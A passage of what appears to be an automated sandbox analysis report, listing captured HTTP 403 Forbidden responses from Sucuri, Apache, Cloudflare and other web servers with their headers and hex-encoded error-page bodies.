6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:44 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:44 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vIz1E0HBHNTLbJ0olzR86ch0aeKNHYZOUfAJEOv%2B8AR4hjmdBjO%2BXyerRAuvq7zTfBhE8iir7G5IbRF9v6d0W2wnyQsaxatQtrTfUswYbns9cTf5vjTIVuaz7zaOWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7fd5aef3718-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 61 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 Data Ascii: 1caf<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-e
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:45 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:45 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 699date: Wed, 22 Mar 2023 04:44:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 